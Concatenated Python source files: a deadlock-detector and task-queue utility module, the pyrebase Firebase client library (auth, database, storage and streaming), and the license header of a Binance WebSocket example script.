    """Context manager that can detect deadlocks.

    It will dump stack frames of all running threads if its 'ping' method isn't
    called in time.

    Usage:
      with DeadlockDetector(timeout=60) as detector:
        for item in some_work():
          ...
          detector.ping()
          ...

    Arguments:
      timeout - maximum allowed time between calls to 'ping'.
    """

    def __init__(self, timeout):
        self.timeout = timeout
        # Watcher thread, alive only between __enter__ and __exit__.
        self._thread = None
        # Thread stop condition. Also lock for shared variables below.
        self._stop_cv = threading.Condition()
        self._stop_flag = False
        # Time when 'ping' was called last time.
        self._last_ping = None
        # True if pings are coming on time.
        self._alive = True

    def __enter__(self):
        """Starts internal watcher thread."""
        assert self._thread is None
        # Seed the deadline before the watcher starts.
        self.ping()
        self._thread = threading.Thread(name='deadlock-detector', target=self._run)
        self._thread.daemon = True
        self._thread.start()
        return self

    def __exit__(self, *_args):
        """Stops internal watcher thread."""
        assert self._thread is not None
        with self._stop_cv:
            self._stop_flag = True
            self._stop_cv.notify()
        self._thread.join()
        # Reset so the detector can be reused in another 'with' block.
        self._thread = None
        self._stop_flag = False

    def ping(self):
        """Notify detector that main thread is still running.

        Should be called periodically to inform the detector that everything is
        running as it should.
        """
        with self._stop_cv:
            self._last_ping = time.time()
            self._alive = True

    def _run(self):
        """Loop that watches for pings and dumps threads state if ping is late."""
        with self._stop_cv:
            while not self._stop_flag:
                # Skipped deadline? Dump threads and switch to 'not alive' state.
                if self._alive and time.time() > self._last_ping + self.timeout:
                    self.dump_threads(time.time() - self._last_ping, True)
                    self._alive = False
                # Pings are on time?
                if self._alive:
                    # Wait until the moment we need to dump stack traces.
                    # Most probably some other thread will call 'ping' to move deadline
                    # further in time. We don't bother to wake up after each 'ping',
                    # only right before initial expected deadline.
                    self._stop_cv.wait(self._last_ping + self.timeout - time.time())
                else:
                    # Skipped some pings previously. Just periodically silently check
                    # for new pings with some arbitrary frequency.
                    self._stop_cv.wait(self.timeout * 0.1)

    @staticmethod
    def dump_threads(timeout=None, skip_current_thread=False):
        """Dumps stack frames of all running threads.

        Arguments:
          timeout: seconds since last ping, included in the report when given.
          skip_current_thread: if True, omits the calling thread's own frame.
        """
        all_threads = threading.enumerate()
        current_thread_id = threading.current_thread().ident
        # Collect tracebacks: thread name -> traceback string.
        tracebacks = {}
        # pylint: disable=W0212
        for thread_id, frame in sys._current_frames().items():
            # Don't dump deadlock detector's own thread, it's boring.
            if thread_id == current_thread_id and skip_current_thread:
                continue
            # Try to get more informative symbolic thread name.
            name = 'untitled'
            for thread in all_threads:
                if thread.ident == thread_id:
                    name = thread.name
                    break
            name += ' #%d' % (thread_id,)
            tracebacks[name] = ''.join(traceback.format_stack(frame))
        # Function to print a message. Makes it easier to change output destination.
        def output(msg):
            logging.warning(msg.rstrip())
        # Print tracebacks, sorting them by thread name. That way a thread pool's
        # threads will be printed as one group.
        output('=============== Potential deadlock detected ===============')
        if timeout is not None:
            output('No pings in last %d sec.' % (timeout,))
        output('Dumping stack frames for all threads:')
        for name in sorted(tracebacks):
            output('Traceback for \'%s\':\n%s' % (name, tracebacks[name]))
        output('===========================================================')
class TaskChannel(object):
    """Queue of results of async task execution."""

    class Timeout(Exception):
        """Raised by 'pull' in case of timeout."""

    # Markers for the kind of item flowing through the internal queue.
    _ITEM_RESULT = object()
    _ITEM_EXCEPTION = object()
    _ITEM_DONE = object()

    def __init__(self):
        self._queue = Queue.Queue()

    def send_result(self, result):
        """Enqueues a result of task execution."""
        self._queue.put((self._ITEM_RESULT, result))

    def send_done(self):
        """Stops the iteration."""
        self._queue.put((self._ITEM_DONE, None))

    def send_exception(self, exc_info=None):
        """Enqueue an exception raised by a task.

        Arguments:
          exc_info: If given, should be 3-tuple returned by sys.exc_info(),
              default is current value of sys.exc_info(). Use default in
              'except' blocks to capture currently processed exception.
        """
        exc_info = exc_info or sys.exc_info()
        assert isinstance(exc_info, tuple) and len(exc_info) == 3
        # Transparently passing Timeout will break 'pull' contract, since a caller
        # has no way to figure out that's an exception from the task and not from
        # 'pull' itself. Transform Timeout into generic RuntimeError with
        # explanation.
        if isinstance(exc_info[1], TaskChannel.Timeout):
            exc_info = (
                RuntimeError,
                RuntimeError('Task raised Timeout exception'),
                exc_info[2])
        self._queue.put((self._ITEM_EXCEPTION, exc_info))

    def __iter__(self):
        return self

    def next(self, timeout=None):
        """Dequeues available result or exception.

        Args:
          timeout: if not None will block no longer than |timeout| seconds and will
              raise TaskChannel.Timeout exception if no results are available.

        Returns:
          Whatever task pushes to the queue by calling 'send_result'.

        Raises:
          TaskChannel.Timeout: waiting longer than |timeout|.
          Whatever exception task raises.
        """
        # Do not ever use timeout == None, in that case signal handlers are not
        # being called (at least on Python 2.7, http://bugs.python.org/issue8844).
        while True:
            try:
                item_type, value = self._queue.get(
                    timeout=timeout if timeout is not None else 30.0)
                break
            except Queue.Empty:
                if timeout is None:
                    continue
                raise TaskChannel.Timeout()
        if item_type == self._ITEM_RESULT:
            return value
        if item_type == self._ITEM_EXCEPTION:
            # 'value' is captured sys.exc_info() 3-tuple. Use extended raise syntax
            # to preserve stack frame of original exception (that was raised in
            # another thread).
            assert isinstance(value, tuple) and len(value) == 3
            six.reraise(value[0], value[1], value[2])
        if item_type == self._ITEM_DONE:
            raise StopIteration()
        assert False, 'Impossible queue item type: %r' % item_type

    # Python 3 spells the iterator protocol '__next__'; alias it so the
    # channel is iterable on both Python 2 and 3 (the module already
    # straddles both via 'six'). Without this, 'for x in channel' raises
    # TypeError on Python 3.
    __next__ = next

    def wrap_task(self, task):
        """Decorator that makes a function push results into this channel."""
        @functools.wraps(task)
        def wrapped(*args, **kwargs):
            try:
                self.send_result(task(*args, **kwargs))
            except Exception:
                self.send_exception()
        return wrapped
def num_processors():
    """Returns the number of processors.

    Python on OSX 10.6 raises a NotImplementedError exception.
    """
    try:
        import multiprocessing
        return multiprocessing.cpu_count()
    except:  # pylint: disable=W0702
        pass
    try:
        # Mac OS 10.6 fallback.
        return int(os.sysconf('SC_NPROCESSORS_ONLN'))  # pylint: disable=E1101
    except:
        # Some of the windows builders seem to get here.
        return 4
|
pyrebase.py | import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except:
from urllib import urlencode, quote
import json
import math
from random import randrange
import time
from collections import OrderedDict
from .pyre_sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from gcloud import storage
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import python_jwt as jwt
from Crypto.PublicKey import RSA
import datetime
def initialize_app(config):
    """Builds a Firebase facade from a web-app configuration dict.

    Arguments:
      config: dict with at least apiKey, authDomain, databaseURL and
          storageBucket keys; may also carry a serviceAccount entry for
          admin access (see Firebase.__init__).
    """
    return Firebase(config)
class Firebase:
    """ Firebase Interface """

    def __init__(self, config):
        """Reads the app config and prepares a shared HTTP session.

        Required config keys: apiKey, authDomain, databaseURL, storageBucket.
        Optional: serviceAccount (path to, or dict of, a service-account key
        file) which enables admin credentials for database/storage access.
        """
        self.api_key = config["apiKey"]
        self.auth_domain = config["authDomain"]
        self.database_url = config["databaseURL"]
        self.storage_bucket = config["storageBucket"]
        self.credentials = None
        # Shared session reused by the auth/database/storage services.
        self.requests = requests.Session()
        if config.get("serviceAccount"):
            scopes = [
                'https://www.googleapis.com/auth/firebase.database',
                'https://www.googleapis.com/auth/userinfo.email',
                "https://www.googleapis.com/auth/cloud-platform"
            ]
            service_account_type = type(config["serviceAccount"])
            # serviceAccount may be a file path or the already-parsed dict.
            if service_account_type is str:
                self.credentials = ServiceAccountCredentials.from_json_keyfile_name(config["serviceAccount"], scopes)
            if service_account_type is dict:
                self.credentials = ServiceAccountCredentials.from_json_keyfile_dict(config["serviceAccount"], scopes)
        if is_appengine_sandbox():
            # Fix error in standard GAE environment
            # is releated to https://github.com/kennethreitz/requests/issues/3187
            # ProtocolError('Connection aborted.', error(13, 'Permission denied'))
            adapter = appengine.AppEngineAdapter(max_retries=3)
        else:
            adapter = requests.adapters.HTTPAdapter(max_retries=3)
        # Retry transient failures on both schemes.
        for scheme in ('http://', 'https://'):
            self.requests.mount(scheme, adapter)

    def auth(self):
        """Returns the Authentication service bound to this app."""
        return Auth(self.api_key, self.requests, self.credentials)

    def database(self):
        """Returns the Realtime Database service bound to this app."""
        return Database(self.credentials, self.api_key, self.database_url, self.requests)

    def storage(self):
        """Returns the Cloud Storage service bound to this app."""
        return Storage(self.credentials, self.storage_bucket, self.requests)
class Auth:
    """ Authentication Service """

    def __init__(self, api_key, requests, credentials):
        # NOTE(review): the methods below call the module-level requests.post
        # rather than this injected session, so the retry adapters mounted in
        # Firebase.__init__ are bypassed — confirm whether that is intended.
        self.api_key = api_key
        self.current_user = None
        self.requests = requests
        self.credentials = credentials

    def sign_in_with_email_and_password(self, email, password):
        """Signs in via the email/password provider; caches and returns the
        user payload (idToken, refreshToken, ...)."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        self.current_user = request_object.json()
        return request_object.json()

    def sign_in_anonymous(self):
        """Creates and signs in an anonymous user; caches and returns it."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8" }
        data = json.dumps({"returnSecureToken": True})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        self.current_user = request_object.json()
        return request_object.json()

    def create_custom_token(self, uid, additional_claims=None, expiry_minutes=60):
        """Mints a signed custom JWT for the given uid (requires a service
        account); valid for expiry_minutes."""
        service_account_email = self.credentials.service_account_email
        private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
        payload = {
            "iss": service_account_email,
            "sub": service_account_email,
            "aud": "https://identitytoolkit.googleapis.com/google.identity.identitytoolkit.v1.IdentityToolkit",
            "uid": uid
        }
        if additional_claims:
            payload["claims"] = additional_claims
        exp = datetime.timedelta(minutes=expiry_minutes)
        return jwt.generate_jwt(payload, private_key, "RS256", exp)

    def sign_in_with_custom_token(self, token):
        """Exchanges a custom token (see create_custom_token) for an ID token."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"returnSecureToken": True, "token": token})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        return request_object.json()

    def refresh(self, refresh_token):
        """Exchanges a refresh token for a fresh ID token."""
        request_ref = "https://securetoken.googleapis.com/v1/token?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"grantType": "refresh_token", "refreshToken": refresh_token})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        request_object_json = request_object.json()
        # handle weirdly formatted response: the token endpoint uses
        # snake_case keys, unlike the rest of the identitytoolkit API.
        user = {
            "userId": request_object_json["user_id"],
            "idToken": request_object_json["id_token"],
            "refreshToken": request_object_json["refresh_token"]
        }
        return user

    def get_account_info(self, id_token):
        """Fetches the account profile for the signed-in user."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getAccountInfo?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"idToken": id_token})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        return request_object.json()

    def send_email_verification(self, id_token):
        """Sends the verify-email message to the signed-in user."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        return request_object.json()

    def send_password_reset_email(self, email):
        """Sends a password-reset message to the given address."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        return request_object.json()

    def verify_password_reset_code(self, reset_code, new_password):
        """Applies a new password using an out-of-band reset code."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/resetPassword?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        return request_object.json()

    def create_user_with_email_and_password(self, email, password):
        """Registers a new email/password user; returns the signup payload."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8" }
        data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        return request_object.json()

    def delete_user_account(self, id_token):
        """Permanently deletes the account bound to the given ID token."""
        request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/deleteAccount?key={0}".format(self.api_key)
        headers = {"content-type": "application/json; charset=UTF-8"}
        data = json.dumps({"idToken": id_token})
        request_object = requests.post(request_ref, headers=headers, data=data)
        raise_detailed_error(request_object)
        return request_object.json()
class Database:
    """ Database Service """

    def __init__(self, credentials, api_key, database_url, requests):
        """Creates a Realtime Database client.

        Arguments:
          credentials: ServiceAccountCredentials or None; when set, OAuth
              bearer tokens are attached to requests (admin access).
          api_key: Firebase web API key.
          database_url: base URL of the database; a trailing '/' is appended
              when missing.
          requests: a requests.Session used for all HTTP calls.
        """
        if not database_url.endswith('/'):
            url = ''.join([database_url, '/'])
        else:
            url = database_url
        self.credentials = credentials
        self.api_key = api_key
        self.database_url = url
        self.requests = requests
        # Mutable reference/query state, consumed and reset by
        # build_request_url() / check_token().
        self.path = ""
        self.build_query = {}
        # State for generate_key(): collision handling within one millisecond.
        self.last_push_time = 0
        self.last_rand_chars = []

    def order_by_key(self):
        """Orders query results by child keys; returns self for chaining."""
        self.build_query["orderBy"] = "$key"
        return self

    def order_by_value(self):
        """Orders query results by child values; returns self for chaining."""
        self.build_query["orderBy"] = "$value"
        return self

    def order_by_child(self, order):
        """Orders query results by the given child key; returns self."""
        self.build_query["orderBy"] = order
        return self

    def start_at(self, start):
        """Limits results to entries >= start (combine with an order_by_*)."""
        self.build_query["startAt"] = start
        return self

    def end_at(self, end):
        """Limits results to entries <= end (combine with an order_by_*)."""
        self.build_query["endAt"] = end
        return self

    def equal_to(self, equal):
        """Limits results to entries equal to the given value."""
        self.build_query["equalTo"] = equal
        return self

    def limit_to_first(self, limit_first):
        """Limits results to the first limit_first entries."""
        self.build_query["limitToFirst"] = limit_first
        return self

    def limit_to_last(self, limit_last):
        """Limits results to the last limit_last entries."""
        self.build_query["limitToLast"] = limit_last
        return self

    def shallow(self):
        """Requests only the keys at the current location."""
        self.build_query["shallow"] = True
        return self

    def child(self, *args):
        """Appends path segments to the current reference; returns self."""
        new_path = "/".join([str(arg) for arg in args])
        if self.path:
            self.path += "/{}".format(new_path)
        else:
            # Normalize a leading slash away so URLs don't end up with '//'.
            if new_path.startswith("/"):
                new_path = new_path[1:]
            self.path = new_path
        return self

    def build_request_url(self, token):
        """Renders the accumulated path/query into a REST URL, then resets them."""
        parameters = {}
        if token:
            parameters['auth'] = token
        for param in list(self.build_query):
            # The REST API expects JSON-encoded filter values: strings quoted,
            # booleans lower-case.
            if type(self.build_query[param]) is str:
                parameters[param] = '"' + self.build_query[param] + '"'
            elif type(self.build_query[param]) is bool:
                parameters[param] = "true" if self.build_query[param] else "false"
            else:
                parameters[param] = self.build_query[param]
        # reset path and build_query for next query
        request_ref = '{0}{1}.json?{2}'.format(self.database_url, self.path, urlencode(parameters))
        self.path = ""
        self.build_query = {}
        return request_ref

    def build_headers(self, token=None):
        """Returns JSON headers; adds an OAuth bearer token for admin access."""
        headers = {"content-type": "application/json; charset=UTF-8"}
        if not token and self.credentials:
            access_token = self.credentials.get_access_token().access_token
            headers['Authorization'] = 'Bearer ' + access_token
        return headers

    def get(self, token=None, json_kwargs={}):
        """Reads the data at the current reference, applying any built query.

        Returns a PyreResponse; sorts client-side when orderBy was requested
        because the REST API does not return ordered JSON.
        """
        build_query = self.build_query
        query_key = self.path.split("/")[-1]
        request_ref = self.build_request_url(token)
        # headers
        headers = self.build_headers(token)
        # do request
        request_object = self.requests.get(request_ref, headers=headers)
        raise_detailed_error(request_object)
        request_dict = request_object.json(**json_kwargs)
        # if primitive or simple query return
        if isinstance(request_dict, list):
            return PyreResponse(convert_list_to_pyre(request_dict), query_key)
        if not isinstance(request_dict, dict):
            return PyreResponse(request_dict, query_key)
        if not build_query:
            return PyreResponse(convert_to_pyre(request_dict.items()), query_key)
        # return keys if shallow
        if build_query.get("shallow"):
            return PyreResponse(request_dict.keys(), query_key)
        # otherwise sort
        sorted_response = None
        if build_query.get("orderBy"):
            if build_query["orderBy"] == "$key":
                sorted_response = sorted(request_dict.items(), key=lambda item: item[0])
            elif build_query["orderBy"] == "$value":
                sorted_response = sorted(request_dict.items(), key=lambda item: item[1])
            else:
                sorted_response = sorted(request_dict.items(), key=lambda item: item[1][build_query["orderBy"]])
        return PyreResponse(convert_to_pyre(sorted_response), query_key)

    def push(self, data, token=None, json_kwargs={}):
        """Appends data under an auto-generated key (HTTP POST)."""
        request_ref = self.check_token(self.database_url, self.path, token)
        self.path = ""
        headers = self.build_headers(token)
        request_object = self.requests.post(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
        raise_detailed_error(request_object)
        return request_object.json()

    def set(self, data, token=None, json_kwargs={}):
        """Overwrites the data at the current reference (HTTP PUT)."""
        request_ref = self.check_token(self.database_url, self.path, token)
        self.path = ""
        headers = self.build_headers(token)
        request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
        raise_detailed_error(request_object)
        return request_object.json()

    def update(self, data, token=None, json_kwargs={}):
        """Merges data into the current reference (HTTP PATCH)."""
        request_ref = self.check_token(self.database_url, self.path, token)
        self.path = ""
        headers = self.build_headers(token)
        request_object = self.requests.patch(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
        raise_detailed_error(request_object)
        return request_object.json()

    def remove(self, token=None):
        """Deletes the data at the current reference (HTTP DELETE)."""
        request_ref = self.check_token(self.database_url, self.path, token)
        self.path = ""
        headers = self.build_headers(token)
        request_object = self.requests.delete(request_ref, headers=headers)
        raise_detailed_error(request_object)
        return request_object.json()

    def stream(self, stream_handler, token=None, stream_id=None, is_async=True):
        """Opens an SSE stream on the current reference; see Stream."""
        request_ref = self.build_request_url(token)
        return Stream(request_ref, stream_handler, self.build_headers, stream_id, is_async)

    def check_token(self, database_url, path, token):
        """Builds the .json REST URL, appending the auth token when given."""
        if token:
            return '{0}{1}.json?auth={2}'.format(database_url, path, token)
        else:
            return '{0}{1}.json'.format(database_url, path)

    def generate_key(self):
        """Generates a Firebase push ID: 20 chars, 8 timestamp + 12 random.

        Keys sort chronologically; two calls in the same millisecond
        increment the previous random suffix (treated as a base-64 counter)
        instead of re-randomizing, guaranteeing monotonically increasing keys.
        """
        push_chars = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
        now = int(time.time() * 1000)
        duplicate_time = now == self.last_push_time
        self.last_push_time = now
        time_stamp_chars = [0] * 8
        for i in reversed(range(0, 8)):
            time_stamp_chars[i] = push_chars[now % 64]
            now = int(math.floor(now / 64))
        new_id = "".join(time_stamp_chars)
        if not duplicate_time:
            self.last_rand_chars = [randrange(64) for _ in range(12)]
        else:
            # Same millisecond as the previous key: add one to the suffix,
            # carrying from the least-significant (last) char. The previous
            # implementation incremented every non-63 char and mapped 63 to 1,
            # which broke ordering and could collide.
            for i in range(11, -1, -1):
                if self.last_rand_chars[i] == 63:
                    self.last_rand_chars[i] = 0
                else:
                    self.last_rand_chars[i] += 1
                    break
        for i in range(0, 12):
            new_id += push_chars[self.last_rand_chars[i]]
        return new_id

    def sort(self, origin, by_key, reverse=False):
        """Re-sorts a PyreResponse client-side by the given child key."""
        # unpack pyre objects
        pyres = origin.each()
        new_list = []
        for pyre in pyres:
            new_list.append(pyre.item)
        # sort
        data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key], reverse=reverse)
        return PyreResponse(convert_to_pyre(data), origin.key())

    def get_etag(self, token=None, json_kwargs={}):
        """Fetches the ETag of the current reference (for conditional writes)."""
        request_ref = self.build_request_url(token)
        headers = self.build_headers(token)
        # extra header to get ETag
        headers['X-Firebase-ETag'] = 'true'
        request_object = self.requests.get(request_ref, headers=headers)
        raise_detailed_error(request_object)
        return request_object.headers['ETag']

    def conditional_set(self, data, etag, token=None, json_kwargs={}):
        """Sets data only when the server-side ETag still matches."""
        request_ref = self.check_token(self.database_url, self.path, token)
        self.path = ""
        headers = self.build_headers(token)
        headers['if-match'] = etag
        request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
        # ETag didn't match, so we should return the correct one for the user to try again
        if request_object.status_code == 412:
            return {'ETag': request_object.headers['ETag']}
        raise_detailed_error(request_object)
        return request_object.json()

    def conditional_remove(self, etag, token=None):
        """Deletes data only when the server-side ETag still matches."""
        request_ref = self.check_token(self.database_url, self.path, token)
        self.path = ""
        headers = self.build_headers(token)
        headers['if-match'] = etag
        request_object = self.requests.delete(request_ref, headers=headers)
        # ETag didn't match, so we should return the correct one for the user to try again
        if request_object.status_code == 412:
            return {'ETag': request_object.headers['ETag']}
        raise_detailed_error(request_object)
        return request_object.json()
class Storage:
    """ Storage Service """

    def __init__(self, credentials, storage_bucket, requests):
        """Creates a Cloud Storage client for the given bucket.

        Arguments:
          credentials: ServiceAccountCredentials or None; when set, a gcloud
              storage client/bucket is created for admin operations.
          storage_bucket: bucket name, e.g. 'project-id.appspot.com'.
          requests: a requests.Session used for REST calls.
        """
        self.storage_bucket = "https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
        self.credentials = credentials
        self.requests = requests
        self.path = ""
        # self.bucket only exists with credentials; admin-only methods
        # (delete, list_files) require it.
        if credentials:
            client = storage.Client(credentials=credentials, project=storage_bucket)
            self.bucket = client.get_bucket(storage_bucket)

    def child(self, *args):
        """Appends path segments to the current reference; returns self."""
        new_path = "/".join(args)
        if self.path:
            self.path += "/{}".format(new_path)
        else:
            if new_path.startswith("/"):
                new_path = new_path[1:]
            self.path = new_path
        return self

    def put(self, file, token=None):
        """Uploads 'file' (a path string or file-like object) to the current path.

        Fix: a file opened here (when 'file' is a path string) is now always
        closed — the previous implementation leaked the handle, and opened it
        needlessly in the credentials branch.
        """
        # reset path
        path = self.path
        self.path = None
        opened_here = isinstance(file, str)
        file_object = open(file, 'rb') if opened_here else file
        try:
            request_ref = self.storage_bucket + "/o?name={0}".format(path)
            if token:
                headers = {"Authorization": "Firebase " + token}
                request_object = self.requests.post(request_ref, headers=headers, data=file_object)
                raise_detailed_error(request_object)
                return request_object.json()
            elif self.credentials:
                blob = self.bucket.blob(path)
                if isinstance(file, str):
                    return blob.upload_from_filename(filename=file)
                else:
                    return blob.upload_from_file(file_obj=file)
            else:
                request_object = self.requests.post(request_ref, data=file_object)
                raise_detailed_error(request_object)
                return request_object.json()
        finally:
            if opened_here:
                file_object.close()

    def delete(self, name):
        """Deletes a blob by name (admin credentials required)."""
        self.bucket.delete_blob(name)

    def download(self, path, filename, token=None):
        """Downloads the blob at 'path' to a local file named 'filename'."""
        # remove leading backlash
        url = self.get_url(token)
        if path.startswith('/'):
            path = path[1:]
        if self.credentials:
            blob = self.bucket.get_blob(path)
            if blob is not None:
                blob.download_to_filename(filename)
        elif token:
            # NOTE(review): uses the module-level requests rather than
            # self.requests, bypassing the session's retry adapters — confirm.
            headers = {"Authorization": "Firebase " + token}
            r = requests.get(url, stream=True, headers=headers)
            if r.status_code == 200:
                with open(filename, 'wb') as f:
                    for chunk in r:
                        f.write(chunk)
        else:
            r = requests.get(url, stream=True)
            if r.status_code == 200:
                with open(filename, 'wb') as f:
                    for chunk in r:
                        f.write(chunk)

    def get_url(self, token):
        """Returns the public media URL for the current path, then resets it."""
        path = self.path
        self.path = None
        if path.startswith('/'):
            path = path[1:]
        if token:
            return "{0}/o/{1}?alt=media&token={2}".format(self.storage_bucket, quote(path, safe=''), token)
        return "{0}/o/{1}?alt=media".format(self.storage_bucket, quote(path, safe=''))

    def list_files(self):
        """Returns an iterator over all blobs (admin credentials required)."""
        return self.bucket.list_blobs()
def raise_detailed_error(request_object):
    """Re-raise any HTTP error from *request_object*, attaching the response body."""
    try:
        request_object.raise_for_status()
    except HTTPError as original_error:
        # Surface the server's error payload, not just the status line.
        # TODO: Check if we get a { "error" : "Permission denied." } and handle automatically
        raise HTTPError(original_error, request_object.text)
def convert_to_pyre(items):
    """Wrap each (key, value) item from a Firebase response in a Pyre object."""
    return [Pyre(item) for item in items]
def convert_list_to_pyre(items):
    """Wrap each element of a plain list in a Pyre keyed by its position.

    Bug fix: the original used ``items.index(item)``, which is O(n^2) and
    returns the index of the *first* occurrence for duplicate values, so
    duplicates all got the same key. ``enumerate`` gives every element its
    own positional key.
    """
    return [Pyre([index, item]) for index, item in enumerate(items)]
class PyreResponse:
    """Wraps a Firebase query response: a list of Pyre items or a primitive."""

    def __init__(self, pyres, query_key):
        self.pyres = pyres
        self.query_key = query_key

    def __getitem__(self, index):
        return self.pyres[index]

    def val(self):
        """Unpack the response into a list, an OrderedDict, or the raw primitive."""
        if not (isinstance(self.pyres, list) and self.pyres):
            # Primitive or simple query result — hand it back unchanged.
            return self.pyres
        if isinstance(self.pyres[0].key(), int):
            # Firebase returned an array: keep only the values, in order.
            return [entry.val() for entry in self.pyres]
        # Firebase returned an object: preserve key order.
        return OrderedDict((entry.key(), entry.val()) for entry in self.pyres)

    def key(self):
        return self.query_key

    def each(self):
        # Only list-shaped responses can be iterated item by item.
        if isinstance(self.pyres, list):
            return self.pyres
class Pyre:
    """A single item from a Firebase response, stored as a (key, value) pair."""

    def __init__(self, item):
        # item is a two-element sequence: [key, value]
        self.item = item

    def val(self):
        """Return the value component of the pair."""
        return self.item[1]

    def key(self):
        """Return the key component of the pair."""
        return self.item[0]
class KeepAuthSession(Session):
    """
    A session that doesn't drop Authentication on redirects between domains.
    """

    def rebuild_auth(self, prepared_request, response):
        # Intentionally a no-op: requests.Session.rebuild_auth normally strips
        # the Authorization header on cross-host redirects; overriding it to do
        # nothing keeps the Firebase token attached through redirects.
        pass
class ClosableSSEClient(SSEClient):
    """SSEClient subclass that can be shut down cleanly from another thread."""

    def __init__(self, *args, **kwargs):
        # Checked by _connect(); flipping it off makes the client stop
        # reconnecting instead of retrying forever.
        self.should_connect = True
        super(ClosableSSEClient, self).__init__(*args, **kwargs)

    def _connect(self):
        if self.should_connect:
            super(ClosableSSEClient, self)._connect()
        else:
            # Ends the SSE iteration loop in the consumer thread.
            raise StopIteration()

    def close(self):
        # Stop reconnect attempts, then force the underlying socket shut to
        # interrupt a blocking read.
        self.should_connect = False
        self.retry = 0
        # NOTE(review): reaches through requests/urllib3 private wrappers to
        # the raw socket — fragile; verify against the pinned library versions.
        self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
        self.resp.raw._fp.fp.raw._sock.close()
class Stream:
    """Manages one SSE stream: connects, parses events, dispatches to a handler."""

    def __init__(self, url, stream_handler, build_headers, stream_id, is_async):
        self.build_headers = build_headers
        self.url = url
        self.stream_handler = stream_handler
        self.stream_id = stream_id
        self.sse = None
        self.thread = None
        if is_async:
            # Consume the stream on a background thread.
            self.start()
        else:
            # Blocks the caller until the stream ends.
            self.start_stream()

    def make_session(self):
        """
        Return a custom session object to be passed to the ClosableSSEClient.
        """
        session = KeepAuthSession()
        return session

    def start(self):
        """Spawn the consumer thread and return self for chaining."""
        self.thread = threading.Thread(target=self.start_stream)
        self.thread.start()
        return self

    def start_stream(self):
        """Open the SSE connection and forward each JSON message to the handler."""
        self.sse = ClosableSSEClient(self.url, session=self.make_session(), build_headers=self.build_headers)
        for msg in self.sse:
            if msg:
                msg_data = json.loads(msg.data)
                msg_data["event"] = msg.event
                if self.stream_id:
                    # Tag the message so multi-stream handlers can tell sources apart.
                    msg_data["stream_id"] = self.stream_id
                self.stream_handler(msg_data)

    def close(self):
        """Shut the SSE connection down and join the consumer thread."""
        # NOTE(review): this wait condition looks buggy — it exits as soon as
        # self.sse is non-None even if 'resp' does not exist yet; the intent
        # was presumably `while not (self.sse and hasattr(self.sse, 'resp'))`.
        # Confirm before changing, since sse.close() dereferences sse.resp.
        while not self.sse and not hasattr(self.sse, 'resp'):
            time.sleep(0.001)
        self.sse.running = False
        self.sse.close()
        self.thread.join()
        return self
|
example_monitoring.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_monitoring.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
